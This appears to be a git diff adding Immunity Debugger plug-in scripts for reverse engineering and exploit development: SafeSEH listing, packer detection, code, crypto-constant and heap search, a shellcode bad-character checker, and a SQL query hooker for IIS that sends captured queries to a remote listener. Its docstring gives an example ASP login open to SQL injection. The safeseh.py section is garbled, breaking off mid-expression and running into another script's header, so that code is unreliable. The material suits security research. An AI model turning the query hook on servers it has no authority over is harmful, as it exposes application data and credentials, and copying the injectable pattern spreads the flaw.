+ name = recon.resolvFunctionByAddress(address)
+ if name:
+ imm.Log("function at %08X FOUND: %s" % (address, name), address, focus=1)
+ imm.gotoDisasmWindow(address)
+ else:
+ imm.Log("function not found", focus=1)
+
+ return "Done in %d secs! see the log for details" % imm.markEnd()
+
+def remakeDictionary(imm, recon, filename, data, action):
+ tmpfd = os.tmpfile()
+ writer = csv.writer(tmpfd)
+ if action == "a" or action == "m":
+ writer.writerow(data)
+
+ for row in recon.dictionaries:
+ row.pop() #drop the filename added by the CSV iterator (always the last element)
+ if action == "a":
+ writer.writerow(row)
+ if action == "m" and data[0] != row[0]:
+ writer.writerow(row)
+ if action == "d" and data != row[0]:
+ writer.writerow(row)
+ tmpfd.flush()
+ del recon
+ del writer
+
+ fd = open(filename, "wb")
+ tmpfd.seek(0)
+ for line in tmpfd:
+ fd.write(line)
+ tmpfd.close()
+ fd.close()
+
+def extractFile(imm, address):
+ for mod in imm.getAllModules().values():
+ if mod.getBaseAddress() <= address and address <= mod.getBaseAddress()+mod.getSize():
+ return os.path.basename(mod.getPath())
+ return ""
diff --git a/1.73/PyCommands/safeseh.py b/1.73/PyCommands/safeseh.py
new file mode 100755
index 0000000..fd06c00
--- /dev/null
+++ b/1.73/PyCommands/safeseh.py
@@ -0,0 +1,90 @@
+#!/usr/bin/env python
+"""
+Immunity Debugger safeseh search
+
+(c) Immunity, Inc. 2004-2007
+
+
+U{Immunity Inc.}
+"""
+
+__VERSION__ = '1.1'
+
+import immlib
+import getopt
+from immutils import *
+import struct
+
+LOG_HANDLERS=True
+
+DESC= "Looks for exception handlers registered with SafeSEH"
+
+def usage(imm):
+ imm.Log("!safeseh (-m module)",focus=1)
+
+def main(args):
+ imm = immlib.Debugger()
+
+ #if not args:
+ # return "Incorrect number of arguments"
+
+ try:
+ opts, argo = getopt.getopt(args, "m:s")
+ except getopt.GetoptError:
+ usage(imm)
+ return "Bad argument %s" % args[0]
+
+ for o,a in opts:
+ if o == "-m":
+ try:
+ #address = int(a, 16)
+ module=a
+ except ValueError, msg:
+ return "Invalid module name: %s" % a
+
+ allmodules=imm.getAllModules()
+ table=imm.createTable('SafeSEH Table',['Module','Handler'])
+ for key in allmodules.keys():
+ mod=imm.getModule(key)
+ mzbase=mod.getBaseAddress()
+ peoffset=struct.unpack('10:
+ sectionaddress,sectionsize=struct.unpack(' Team PEiD
+# http://www.SecretAsHell.com/BobSoft/
+# BobSoft@GMail.Com
+#
+#-------------------------------------------------------------------------------
+#
+# Based on findpacker.py, this script will scan the entrypoint or whole file of
+# the main module, using Ero's PEFile and my UserDB.txt as before ..
+# Also added is logging of the entropy of the file and a guess based on the
+# entropy as to whether the file is packed or not.
+#
+# By BoB, whilst freezing in England.. ;)
+# I only started with Python a week ago, and this is my first ever script ..
+# So, please excuse any bad Python coding :P
+#
+# Thanks to JMS for checking my dodgy code .. :)
+#
+#-------------------------------------------------------------------------------
+
+
+__VERSION__ = '1.00'
+ProgName = 'ScanPE'
+ProgVers = __VERSION__
+DESC = "Detect a Packer/Cryptor of Main Module, also scan just EntryPoint .."
+
+
+import immlib
+import math
+import pefile
+import peutils
+
+
+#-------------------------------------------------------------------------------
+
+def usage(imm):
+ imm.log(" ")
+ imm.log("%s v%s By BoB -> Team PEiD" % (ProgName, ProgVers), focus=1, highlight=1)
+ imm.Log("This script will scan the loaded module for any matching signatures in .\Data\UserDB.TXT ..")
+ imm.Log("Usage:")
+ imm.Log(" !%s [-h]" % ProgName.lower())
+ imm.log(" ")
+ imm.log("Options:")
+ imm.Log(" -h : Hardcore mode - Scan whole file .. (default is to scan just the Entrypoint)")
+ imm.log(" ")
+ return "See log window (Alt-L) for usage .. "
+
+
+#-------------------------------------------------------------------------------
+# RawToRva - Convert offset to Rva ..
+
+def rawToRva(pe, Raw):
+ sections = [s for s in pe.sections if s.contains_offset(Raw)]
+ if sections:
+ section = sections[0]
+ return (Raw - section.PointerToRawData) + section.VirtualAddress
+ else:
+ return 0
+
+
+#-------------------------------------------------------------------------------
+# GetSectionInfo - Returns info about section as string ..
+
+def getSectionInfo(pe, Va):
+ sec = pe.get_section_by_rva(Va - pe.OPTIONAL_HEADER.ImageBase)
+ if sec:
+ # Get section number ..
+ sn = 0
+ for i in range(pe.FILE_HEADER.NumberOfSections):
+ if pe.sections[i] == sec:
+ sn = i + 1
+ break
+ # Get section name ..
+ name = ""
+ for j in range(7):
+ # Only until first null ..
+ if sec.Name[j] == chr(0):
+ break
+ name = "%s%s" % (name, sec.Name[j])
+ # If name is not blank then set name string to ', ""'' ..
+ if name != "":
+ name = ", \"%s\"" % name
+ # Return section number and name (if exist) ..
+ return " (section #%02d%s)" % (sn, name)
+ return " (not in a section)"
+
+
+#-------------------------------------------------------------------------------
+# GetEntropy - Returns entropy of some data - Taken from Ero's PEFile.py ..
+
+def getEntropy(data):
+ """Calculate the entropy of a chunk of data."""
+
+ if not data:
+ return 0
+
+ entropy = 0
+ for x in range(256):
+ p_x = float(data.count(chr(x)))/len(data)
+ if p_x > 0:
+ entropy += - p_x*math.log(p_x, 2)
+
+ return entropy
+
+
+#-------------------------------------------------------------------------------
+
+def main(args):
+ imm = immlib.Debugger()
+ name = imm.getDebuggedName()
+
+ EP_Only = 1
+ if args:
+ if args[0].lower() == '-h':
+ EP_Only = 0
+ try:
+ Mod = imm.getModule(name)
+ if not Mod:
+ raise Exception, "Couldn't find %s .." % name
+ except Exception, msg:
+ return "Error: %s" % msg
+
+ imm.log(" ")
+ imm.log("%s v%s By BoB -> Team PEiD" % (ProgName, ProgVers), focus=1, highlight=1)
+ imm.Log("Processing \"%s\" .." % name)
+
+ # Load PE File ..
+ pe = pefile.PE(name = Mod.getPath())
+
+ # Displays same guessed results as PEiD -> Extra information -> Entropy ..
+ e = getEntropy( pe.__data__ )
+ if e < 6.0:
+ a = "Not packed"
+ elif e < 7.0:
+ a = "Maybe packed"
+ else: # 7.0 .. 8.0
+ a = "Packed"
+
+ # Start processing ..
+ imm.Log(" o File Entropy : %.2f (%s)" % (e, a))
+ imm.Log(" o Loading signatures ..")
+ imm.setStatusBar("Loading signatures ..")
+ # Show now as sigs take a few seconds to load ..
+ imm.updateLog()
+
+ # Load signatures ..
+ sig_db = peutils.SignatureDatabase('Data/UserDB.TXT')
+ imm.Log(" o %d total sigs in database .." % (sig_db.signature_count_eponly_true + sig_db.signature_count_eponly_false + sig_db.signature_count_section_start))
+ # Display number of signatures to scan ..
+ if EP_Only == 1:
+ imm.Log(" o %d EntryPoint sigs to scan .." % sig_db.signature_count_eponly_true)
+ imm.Log(" o Scanning Entrypoint ..")
+ imm.setStatusBar("Scanning Entrypoint ..")
+ else:
+ imm.Log(" o %d sigs to scan in hardcore mode .." % sig_db.signature_count_eponly_false)
+ imm.Log(" o Scanning whole file ..")
+ imm.setStatusBar("Scanning whole file .. This may take a few minutes, so go make a coffee ..")
+ imm.log(" ")
+ # Force update now or user will not know any info until scan finished ..
+ # Which can take minutes for a large file scanned with -a option ..
+ imm.updateLog()
+
+ # Do the scan, EP only or hardcore mode ..
+ ret = sig_db.match( pe, EP_Only == 1 )
+
+ # Display results of scan ..
+ imm.log("Result:")
+ if not ret:
+ imm.log(" Nothing found ..")
+ imm.log(" ")
+ return "Nothing found .."
+
+ if EP_Only == 1:
+ # If EP detection then result is a string and we know EP address ..
+ va = pe.OPTIONAL_HEADER.ImageBase + pe.OPTIONAL_HEADER.AddressOfEntryPoint
+ addr = pe.get_offset_from_rva(pe.OPTIONAL_HEADER.AddressOfEntryPoint)
+ imm.log(" Found \"%s\" at offset 0x%08X %s" % (ret[0], addr, getSectionInfo(pe, va)), address = va)
+ imm.log(" ")
+ return "Found \"%s\" at 0x%08X .." % (ret[0], va)
+ else:
+ # If more than 1 returned detection, then display all possibilities ..
+ if len(ret) > 1:
+ a = 1
+ for (addr, name) in ret:
+ va = pe.OPTIONAL_HEADER.ImageBase + rawToRva(pe, addr)
+ imm.Log(' %02d : \"%s\" at offset 0x%08X %s' % (a, name[0], addr, getSectionInfo(pe, va)), address = va)
+ a += 1
+ imm.log(" ")
+ return "Found %d possible matches .." % len(ret)
+ else:
+ # If only 1 detection then display result ..
+ for (addr, name) in ret:
+ va = pe.OPTIONAL_HEADER.ImageBase + rawToRva(pe, addr)
+ imm.Log(' Found \"%s\" at offset 0x%08X %s' % (name[0], addr, getSectionInfo(pe, va)), address = va)
+ imm.log(" ")
+ return "Found \"%s\" at 0x%08X .." % (name[0], va)
+
diff --git a/1.73/PyCommands/search.py b/1.73/PyCommands/search.py
new file mode 100755
index 0000000..c2af17f
--- /dev/null
+++ b/1.73/PyCommands/search.py
@@ -0,0 +1,37 @@
+"""
+Immunity Debugger Regexp Search
+
+(c) Immunity, Inc. 2004-2007
+
+
+U{Immunity Inc.}
+
+search.py - simple script that lets you quickie search for regexp
+"""
+
+__VERSION__ = '1.1'
+
+
+import immlib
+
+# TODO: -a -m , search all on no -m
+# TODO: migrate/replace searchcode.py
+
+DESC = "Search for given assembly code"
+
+def usage(imm):
+ imm.Log("!search ")
+ imm.Log("For example: !search pop r32\npop r32\nret")
+ return "See Log Window"
+
+def main(args):
+ if not args:
+ return "Usage: !search "
+ imm = immlib.Debugger()
+ code = " ".join(args).replace("\\n","\n")
+ ret = imm.searchCommands(code.upper())
+ for a in ret:
+ result=imm.disasm(a[0])
+ imm.Log("Found %s at 0x%X (%s)"% (result.result, a[0], a[2]), address=a[0], focus=1)
+ return "Search completed!"
+
diff --git a/1.73/PyCommands/searchcode.py b/1.73/PyCommands/searchcode.py
new file mode 100755
index 0000000..a11a64a
--- /dev/null
+++ b/1.73/PyCommands/searchcode.py
@@ -0,0 +1,42 @@
+#!/usr/bin/env python
+
+"""
+(c) Immunity, Inc. 2004-2007
+
+
+U{Immunity Inc.}
+"""
+
+
+__VERSION__ = '1.0'
+import immlib
+
+DESC = "Search code in memory"
+
+def usage(imm):
+ imm.Log("!searchcode Search code in memory")
+ imm.Log("!searchcode ")
+
+def main(args):
+ imm = immlib.Debugger()
+
+ look = " ".join(args)
+ ret = imm.Search( imm.Assemble( look ) )
+
+ for a in ret:
+
+ module = imm.findModule(a)
+ if not module:
+ module = "none"
+ else:
+ module = module[0]
+
+ # Grab the memory access type for this address
+ page = imm.getMemoryPagebyAddress( a )
+ access = page.getAccess( human = True )
+
+ imm.Log("Found %s at 0x%08x [%s] Access: (%s)" % (look, a, module, access), address = a)
+ if ret:
+ return "Found %d address (Check the Log Windows for details)" % len(ret)
+ else:
+ return "Sorry, no code found"
diff --git a/1.73/PyCommands/searchcrypt.py b/1.73/PyCommands/searchcrypt.py
new file mode 100755
index 0000000..cd60c23
--- /dev/null
+++ b/1.73/PyCommands/searchcrypt.py
@@ -0,0 +1,148 @@
+"""
+(c) Immunity, Inc. 2004-2007
+
+
+U{Immunity Inc.}
+
+Search a defined memory range looking for cryptographic routines
+"""
+
+
+__VERSION__ = '1.0'
+import immlib
+import getopt
+from immutils import *
+
+DESC = "Search a defined memory range looking for cryptographic routines"
+
+def usage(imm):
+ imm.Log("!searchcrypt [-a FROMADDRESS] [-t TOADDRESS] [-o OWNER]", focus=1)
+ imm.Log(" FROMADDRESS start address")
+ imm.Log(" TOADDRESS end address")
+ imm.Log(" OWNER memory page owner")
+ imm.Log("ex: !searchcrypt -a 0x70000000")
+
+def main(args):
+ imm = immlib.Debugger()
+
+ try:
+ opts, notused = getopt.getopt(args, "a:t:o:")
+ except getopt.GetoptError:
+ usage(imm)
+ return "Wrong Arguments (Check usage on the Log Window)"
+
+ fromaddy = toaddy = owner = None
+
+ for o,a in opts:
+ if o == '-a':
+ try:
+ fromaddy = int( a, 16 )
+ except ValueError:
+ usage(imm)
+ return "Wrong Address (%s) % " % a
+ if o == '-t':
+ try:
+ toaddy = int( a, 16 )
+ except ValueError:
+ usage(imm)
+ return "Wrong Address (%s) % " % a
+ if o == '-o':
+ owner = a
+
+ if isinstance(toaddy, int) and isinstance(fromaddy, int) and toaddy <= fromaddy:
+ usage(imm)
+ return "end address can't be less than start address"
+
+ result = []
+
+ #the first dword has to be unique in the complete dictionary to get an accurate address
+ consts = {
+ "AES": [ 0xc66363a5, 0xf87c7c84, 0xee777799, 0xf67b7b8d, 0xfff2f20d, 0xd66b6bbd, 0xde6f6fb1, 0x91c5c554, 0x60303050, 0x02010103, 0xce6767a9, 0x562b2b7d, 0xe7fefe19, 0xb5d7d762, 0x4dababe6, 0xec76769a, 0x8fcaca45, 0x1f82829d, 0x89c9c940, 0xfa7d7d87, 0xeffafa15, 0xb25959eb, 0x8e4747c9, 0xfbf0f00b, 0x41adadec, 0xb3d4d467, 0x5fa2a2fd, 0x45afafea, 0x239c9cbf, 0x53a4a4f7, 0xe4727296, 0x9bc0c05b, 0x75b7b7c2, 0xe1fdfd1c, 0x3d9393ae, 0x4c26266a, 0x6c36365a, 0x7e3f3f41, 0xf5f7f702, 0x83cccc4f, 0x6834345c, 0x51a5a5f4, 0xd1e5e534, 0xf9f1f108, 0xe2717193, 0xabd8d873, 0x62313153, 0x2a15153f, 0x0804040c, 0x95c7c752, 0x46232365, 0x9dc3c35e, 0x30181828, 0x379696a1, 0x0a05050f, 0x2f9a9ab5 ], \
+ "BLOWFISH": [ 0x243f6a88, 0x85a308d3, 0x13198a2e, 0x03707344, 0xa4093822, 0x299f31d0, 0x082efa98, 0xec4e6c89, 0x452821e6, 0x38d01377, 0xbe5466cf, 0x34e90c6c, 0xc0ac29b7, 0xc97c50dd, 0x3f84d5b5, 0xb5470917, 0x9216d5d9, 0x8979fb1b ], \
+ "CAMELLIA": [ 0xA09E667F, 0x3BCC908B, 0xB67AE858, 0x4CAA73B2, 0xC6EF372F, 0xE94F82BE, 0x54FF53A5, 0xF1D36F1C, 0x10E527FA, 0xDE682D1D, 0xB05688C2, 0xB3E6C1FD ], \
+ "CAST": [ 0x30fb40d4, 0x9fa0ff0b, 0x6beccd2f, 0x3f258c7a, 0x1e213f2f, 0x9c004dd3, 0x6003e540, 0xcf9fc949, 0xbfd4af27, 0x88bbbdb5, 0xe2034090, 0x98d09675, 0x6e63a0e0, 0x15c361d2, 0xc2e7661d, 0x22d4ff8e, 0x28683b6f, 0xc07fd059, 0xff2379c8, 0x775f50e2, 0x43c340d3, 0xdf2f8656, 0x887ca41a, 0xa2d2bd2d, 0xa1c9e0d6, 0x346c4819, 0x61b76d87, 0x22540f2f, 0x2abe32e1, 0xaa54166b, 0x22568e3a, 0xa2d341d0, 0x66db40c8, 0xa784392f, 0x004dff2f, 0x2db9d2de, 0x97943fac, 0x4a97c1d8, 0x527644b7, 0xb5f437a7, 0xb82cbaef, 0xd751d159, 0x6ff7f0ed, 0x5a097a1f, 0x827b68d0, 0x90ecf52e, 0x22b0c054, 0xbc8e5935, 0x4b6d2f7f, 0x50bb64a2, 0xd2664910, 0xbee5812d, 0xb7332290, 0xe93b159f, 0xb48ee411, 0x4bff345d, 0xfd45c240, 0xad31973f, 0xc4f6d02e, 0x55fc8165, 0xd5b1caad, 0xa1ac2dae, 0xa2d4b76d, 0xc19b0c50, 0x882240f2, 0x0c6e4f38, 0xa4e4bfd7, 0x4f5ba272, 0x564c1d2f, 0xc59c5319, 0xb949e354, 0xb04669fe, 0xb1b6ab8a, 0xc71358dd, 0x6385c545, 0x110f935d, 0x57538ad5, 0x6a390493, 0xe63d37e0, 0x2a54f6b3, 0x3a787d5f, 0x6276a0b5, 0x19a6fcdf, 0x7a42206a, 0x29f9d4d5, 0xf61b1891, 0xbb72275e, 0xaa508167, 0x38901091, 0xc6b505eb, 0x84c7cb8c, 0x2ad75a0f, 0x874a1427, 0xa2d1936b, 0x2ad286af, 0xaa56d291, 0xd7894360, 0x425c750d, 0x93b39e26, 0x187184c9, 0x6c00b32d, 0x73e2bb14, 0xa0bebc3c, 0x54623779 ], \
+ "MD5": [ 0xd76aa478, 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476, 0xe8c7b756, 0x242070db, 0xc1bdceee, 0xf57c0faf, 0x4787c62a, 0xa8304613, 0xfd469501, 0x698098d8, 0x8b44f7af, 0xffff5bb1, 0x895cd7be, 0x6b901122, 0xfd987193, 0xa679438e, 0x49b40821 ], \
+ "RC2": [ 0xc4f978d9, 0xedb5dd19, 0x79fde928, 0x9dd8a04a, 0x83377ec6, 0x8e53762b, 0x88644c62, 0xa2fb8b44, 0xf5599a17, 0x134fb387, 0x8d6d4561, 0x327d8109, 0xeb408fbd, 0x0b7bb786, 0x222195f0, 0x824e6b5c, 0x9365d654, 0x1cb260ce, 0x14c05673, 0xdcf18ca7, 0x1fca7512, 0xd1e4be3b, 0x30d43d42, 0x26b63ca3, 0xda0ebf6f, 0x57076946, 0x9b1df227, 0x034394bc, 0xf6c711f8, 0xe73eef90, 0x2fd5c306, 0xd71e66c8, 0xdeeae808, 0xf7ee5280, 0xac72aa84, 0x2a6a4d35, 0x71d21a96, 0x7449155a, 0x5ed09f4b, 0xeca41804, 0x6e41e0c2, 0xcccb510f, 0x50af9124, 0x3970f4a1, 0x853a7c99, 0x7ab4b823, 0x5b3602fc, 0x31975525, 0x98fa5d2d, 0xae928ae3, 0x1029df05, 0xc9ba6c67, 0xcfe600d3, 0x2ca89ee1, 0x3f011663, 0xa989e258, 0x1b34380d, 0xb0ff33ab, 0x5f0c48bb, 0x2ecdb1b9, 0x47dbf3c5, 0x779ca5e5, 0x6820a60a, 0xadc17ffe ], \
+ "RC5": [ 0xb7e15163, 0x9e3779b9 ], \
+ "RIPEMD160": [ 0x50A28BE6, 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476, 0xC3D2E1F0, 0x00000000, 0x5A827999, 0x6ED9EBA1, 0x8F1BBCDC, 0xA953FD4E, 0x5C4DD124, 0x6D703EF3, 0x7A6D76E9 ], \
+ "SHA1": [ 0xCA62C1D6, 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476, 0xC3D2E1F0, 0x5A827999, 0x6ED9EBA1, 0x8F1BBCDC ], \
+ "SHA256": [ 0xc67178f2, 0x6a09e667, 0xbb67ae85, 0x3c6ef372, 0xa54ff53a, 0x510e527f, 0x9b05688c, 0x1f83d9ab, 0x5be0cd19, 0x428a2f98, 0x71374491, 0xb5c0fbcf, 0xe9b5dba5, 0x3956c25b, 0x59f111f1, 0x923f82a4, 0xab1c5ed5, 0xd807aa98, 0x12835b01, 0x243185be, 0x550c7dc3, 0x72be5d74, 0x80deb1fe, 0x9bdc06a7, 0xc19bf174, 0xe49b69c1, 0xefbe4786, 0x0fc19dc6, 0x240ca1cc, 0x2de92c6f, 0x4a7484aa, 0x5cb0a9dc, 0x76f988da, 0x983e5152, 0xa831c66d, 0xb00327c8, 0xbf597fc7, 0xc6e00bf3, 0xd5a79147, 0x06ca6351, 0x14292967, 0x27b70a85, 0x2e1b2138, 0x4d2c6dfc, 0x53380d13, 0x650a7354, 0x766a0abb, 0x81c2c92e, 0x92722c85, 0xa2bfe8a1, 0xa81a664b, 0xc24b8b70, 0xc76c51a3, 0xd192e819, 0xd6990624, 0xf40e3585, 0x106aa070, 0x19a4c116, 0x1e376c08, 0x2748774c, 0x34b0bcb5, 0x391c0cb3, 0x4ed8aa4a, 0x5b9cca4f, 0x682e6ff3, 0x748f82ee, 0x78a5636f, 0x84c87814, 0x8cc70208, 0x90befffa, 0xa4506ceb, 0xbef9a3f7 ], \
+ "SHA512": [ 0xf3bcc908, 0x6a09e667, 0xbb67ae85, 0x84caa73b, 0x3c6ef372, 0xfe94f82b, 0xa54ff53a, 0x5f1d36f1, 0x510e527f, 0xade682d1, 0x9b05688c, 0x2b3e6c1f, 0x1f83d9ab, 0xfb41bd6b, 0x5be0cd19, 0x137e2179, 0x428a2f98, 0xd728ae22, 0x71374491, 0x23ef65cd, 0xb5c0fbcf, 0xec4d3b2f, 0xe9b5dba5, 0x8189dbbc, 0x3956c25b, 0xf348b538, 0x59f111f1, 0xb605d019, 0x923f82a4, 0xaf194f9b, 0xab1c5ed5, 0xda6d8118, 0xd807aa98, 0xa3030242, 0x12835b01, 0x45706fbe, 0x243185be, 0x4ee4b28c, 0x550c7dc3, 0xd5ffb4e2, 0x72be5d74, 0xf27b896f, 0x80deb1fe, 0x3b1696b1, 0x9bdc06a7, 0x25c71235, 0xc19bf174, 0xcf692694, 0xe49b69c1, 0x9ef14ad2, 0xefbe4786, 0x384f25e3, 0x0fc19dc6, 0x8b8cd5b5, 0x240ca1cc, 0x77ac9c65, 0x2de92c6f, 0x592b0275, 0x4a7484aa, 0x6ea6e483 ] \
+ }
+
+ result = MultiSearch(imm, consts, fromaddy, toaddy, owner)
+
+ for name,addy in result:
+ mem = imm.getMemoryPagebyAddress(addy)
+ imm.Log("Const Found: %10s Owner: %s - Section: %s" % ( name, mem.getOwner(), \
+ mem.getSection() ), addy )
+
+ return "search finished"
+
+
+def MultiSearch(imm, consts, fromaddy, toaddy, arg_owner):
+ if not consts:
+ return []
+
+ found = []
+ hits = {}
+ addys = {}
+
+ for a in imm.getMemoryPages().keys():
+ if isinstance(fromaddy, int) and a < fromaddy:
+ continue
+
+ if isinstance(toaddy, int) and a > toaddy:
+ continue
+
+ owner = imm.MemoryPages[a].getOwner()
+
+ if isinstance(arg_owner, str) and owner.upper() != arg_owner.upper():
+ continue
+
+ mem = imm.MemoryPages[a].getMemory()
+
+ if not mem:
+ continue
+
+ for name,consts_list in consts.iteritems():
+
+ if not isinstance(consts_list,list):
+ consts_list = [ consts_list ]
+
+ count = 0
+ for const in consts_list:
+ const = int2str32_swapped(const)
+
+ f = mem.find ( const )
+
+ if f == -1:
+ continue
+
+ #check if it's outside the scope of my search
+ if isinstance(toaddy, int) and (f + a) > toaddy:
+ break
+
+ #we save the hits by owner
+ try:
+ hits[name][owner] += 1
+ except KeyError:
+ if not hits.has_key(name):
+ hits[name] = {}
+ hits[name][owner] = 1
+
+ #get the address of the first hit
+ if not addys.has_key(name):
+ addys[name] = {}
+ if not addys[name].has_key(owner):
+ addys[name][owner] = f + a
+
+
+ # it has to match every const to get a real match
+ for name,consts_list in consts.iteritems():
+ if hits.has_key(name):
+ for owner,count in hits[name].iteritems():
+ if count >= len(consts_list):
+ found.append( [name, addys[name][owner] ] )
+
+ return found
diff --git a/1.73/PyCommands/searchheap.py b/1.73/PyCommands/searchheap.py
new file mode 100755
index 0000000..54fa711
--- /dev/null
+++ b/1.73/PyCommands/searchheap.py
@@ -0,0 +1,76 @@
+#!/usr/bin/env python
+
+"""
+(c) Immunity, Inc. 2004-2007
+
+
+U{Immunity Inc.}
+"""
+
+
+__VERSION__ = '1.0'
+
+import immlib
+import getopt
+from libheap import *
+
+DESC = "Search the heap for specific chunks"
+
+def usage(imm):
+ imm.Log("!searchheap Search the heap for specific chunks")
+ imm.Log("!searchheap [-h HEAP_ADDR] [-s] [-r] [-f] [-c]")
+ imm.Log(" -h HEAPADDR Set the heap address to inspect")
+ imm.Log(" -w what What to search for: size, prevsize, flags, address, next, prev")
+ imm.Log(" -a action Search action: =, !=, >, <, >=, <=, &, not")
+ imm.Log(" -v value Value to be searched")
+ imm.Log(" -k Show the content of the chunk")
+ imm.Log(" -r Use the restored heap (see !heap for more details)")
+
+
+def main(args):
+ imm = immlib.Debugger()
+ imm.Log("### Immunity's Search Heap ###")
+
+ try:
+ opts, argo = getopt.getopt(args, "h:w:a:v:rk", ["heap=", "what=", "action=", "value="])
+ except getopt.GetoptError:
+ imm.setStatusBar("Bad heap argument %s" % args[0])
+ usage(imm)
+ return 0
+
+ heap = 0x0
+ what = None
+ action = None
+ value = None
+ restore = False
+ chunkdisplay = 0
+
+ for o,a in opts:
+ if o == "-h":
+ try:
+ heap = int(a, 16)
+ except ValueError, msg:
+ imm.InfoLine("Invalid heap address: %s" % a)
+ return 0
+ elif o == "-r":
+ restore = True
+ elif o == "-k":
+ chunkdisplay = SHOWCHUNK_FULL
+ elif o in ("-w", "--what"):
+ what = a
+ elif o in ("-a", "--action"):
+ action = a
+ elif o in ("-v", "--value"):
+ try:
+ value = int(a, 16)
+ except ValueError, msg:
+ return "Invalid value: %s" % a
+ return 0
+
+ if not heap or ( heap in imm.getHeapsAddress() ):
+ s = SearchHeap(imm, what, action, value, heap = heap, restore = restore, option = chunkdisplay)
+ if heap:
+ return "Heap 0x%x dumped" % heap
+ else:
+ return "Heap dumped"
+ return "Wrong Heap"
\ No newline at end of file
diff --git a/1.73/PyCommands/shellcodediff.py b/1.73/PyCommands/shellcodediff.py
new file mode 100755
index 0000000..363365b
--- /dev/null
+++ b/1.73/PyCommands/shellcodediff.py
@@ -0,0 +1,82 @@
+#!/usr/bin/env python
+
+"""
+(c) Immunity, Inc. 2004-2008
+
+
+U{Immunity Inc.}
+
+Shellcode diff
+
+"""
+
+
+DESC="""Check for badchars"""
+
+from immlib import *
+import sys
+
+sys.path.append(".")
+sys.path.append("../PyCommands")
+def main(args):
+ imm = Debugger()
+
+ address = 0
+ length = 0
+ bad_byte_offset = 0
+ mangled = False
+
+ address = int(args[0],16)
+
+
+
+
+ fd = open("shellcode.txt","r")
+ canvas_byte_list = fd.readlines()
+ fd.close()
+
+ canvas_shellcode = ""
+ # Just pretty this up
+ for i in canvas_byte_list:
+ canvas_shellcode += i.rstrip("\x0a")
+ length = len(canvas_shellcode) / 2
+
+ id_shellcode = imm.readMemory( address, length )
+ id_shellcode = id_shellcode.encode("HEX")
+ imm.log("Address: 0x%08x" % address)
+ imm.log("SC Len : %d" % length)
+
+ imm.log("CANVAS Shellcode: %s" % canvas_shellcode[:512])
+ imm.log("ID Shellcode: %s" % id_shellcode[:512])
+
+ count = 0
+
+ # We use the CANVAS shellcode length here again cause
+ # presumably its not mangled
+ while count <= (length*2):
+
+ if id_shellcode[count] != canvas_shellcode[count]:
+
+ imm.log("Missed at byte: %d" % count)
+ bad_byte_offset = count
+ mangled = True
+ break
+
+ count += 1
+
+ if mangled:
+ imm.log(" ")
+ imm.log("Bad byte is centered in output with three leading and three trailing bytes.")
+ imm.log(" ")
+ imm.log("Bad byte at offset: %d" % bad_byte_offset)
+ imm.log("Bad byte value from attacker: %s" % canvas_shellcode[bad_byte_offset:bad_byte_offset+2])
+ imm.log("====================\n\n")
+
+ imm.log("CANVAS: %s %s %s" % (canvas_shellcode[bad_byte_offset-6:bad_byte_offset],canvas_shellcode[bad_byte_offset:bad_byte_offset+2],canvas_shellcode[bad_byte_offset+2:bad_byte_offset+6]))
+ imm.log("ID : %s %s %s" % (id_shellcode[bad_byte_offset-6:bad_byte_offset], id_shellcode[bad_byte_offset:bad_byte_offset+2],id_shellcode[bad_byte_offset+2:bad_byte_offset+6]))
+
+ imm.log("\n\n====================")
+
+
+
+ return "Shellcode diff output to log window."
diff --git a/1.73/PyCommands/sqlhooker.py b/1.73/PyCommands/sqlhooker.py
new file mode 100755
index 0000000..cbe2b4c
--- /dev/null
+++ b/1.73/PyCommands/sqlhooker.py
@@ -0,0 +1,198 @@
+#/usr/bin/env python
+
+import getopt
+import xmlrpclib
+import traceback
+import struct
+import debugger #needed on old ID for removeHook
+
+from immlib import *
+
+LICENSE="BSD 3-clause non-attribution" #yay!
+copyright="(C) Immunity, Inc., jms@bughunter.ca"
+
+"""
+
+This script supports the SQLOLEDB method of executing queries and, when
+combined with sql_listener.py will send you all the queries executed by a web
+application. Server-side filtering (necessary to avoid sending thousands of
+queries a second to you on a busy server) is stubbed in for later. We hooked
+IIS rather than SQL Server because common practice is to have your SQL tier
+un-routable, but the web tier is likely to have Internet access.
+
+Somewhat later we'll have this integrate into SPIKE Proxy and other tools to
+automate detection of blind-sql attacks/detection and sql injection in
+general.
+
+In order to use this script:
+
+1. Run a few queries against your target server, this will start up two
+dllhost.exe's
+
+2. Load Immunity Debugger and attach to the second dllhost.exe (this can be
+slightly tricky if the PID for the second one is lower than the first, but
+eventually we'll automate it)
+
+3. run !sqlhooker -s myhostip:myport. For example, I use !sqlhooker
+192.168.1.1:8081, and then on my .1 machine I run "python sql_listener.py
+8081".
+
+Here's an example snippet of ASP script this would work against:
+_start cut_
+set conn = server.createObject("ADODB.Connection")
+set rs = server.createObject("ADODB.Recordset")
+
+query = "select count(*) from users where userName='" & userName & "' and userPass='" & password & "'"
+
+conn.Open "Provider=SQLOLEDB; Data Source=(local); Initial Catalog=myDB; User Id=sa; Password="
+rs.activeConnection = conn
+rs.open query
+_end cut_
+We currently support:
+
+WinXPPro Sp2, IIS 5.0 SQLServer 2000
+Win2K3, IIS 6.0, SQLServer 2000
+Win2K, IIS 5.0, SQLServer 2000
+Win2K Old,IIS 5.0, SQLServer 2000
+
+If anyone has requests for other database systems, they should email us, along
+with the necessary information to get an application running, and we will
+spend the time to find you hook spots. Or just submit a patch to
+forum.immunityinc.com.
+
+
+"""
+
+class ole_hooker(LogBpHook):
+
+ def __init__(self,hook_version,xmlhost=None,xmlport=0):
+
+ LogBpHook.__init__(self)
+
+ self.imm = Debugger()
+ self.hook_version = hook_version
+ self.xmlhost = xmlhost
+ self.xmlport = int(xmlport)
+
+ def run(self,regs):
+ '''
+ Called everytime the SQL hook is hit.
+ '''
+
+ self.imm.Log("Hook version: %s" % self.hook_version)
+
+ if self.hook_version == "winxp_pro_sp2" or self.hook_version == "win2k3":
+ sql_addr = regs['EDI']
+
+ if self.hook_version == "win2k":
+ sql_addr = regs['ESI']
+
+ if self.hook_version == "win2k_old":
+ buffer_ptr = self.imm.readMemory(regs['ESP'] + 4, 4)
+ buffer_ptr = struct.unpack("L", buffer_ptr)
+ sql_addr = buffer_ptr[0]
+
+ sql_query = self.imm.readWString(sql_addr)
+ sql_query = sql_query.replace("\x00","")
+
+ self.imm.Log("SQL Query: %s" % sql_query)
+
+ using_xml_rpc = False
+
+ if self.xmlport != 0:
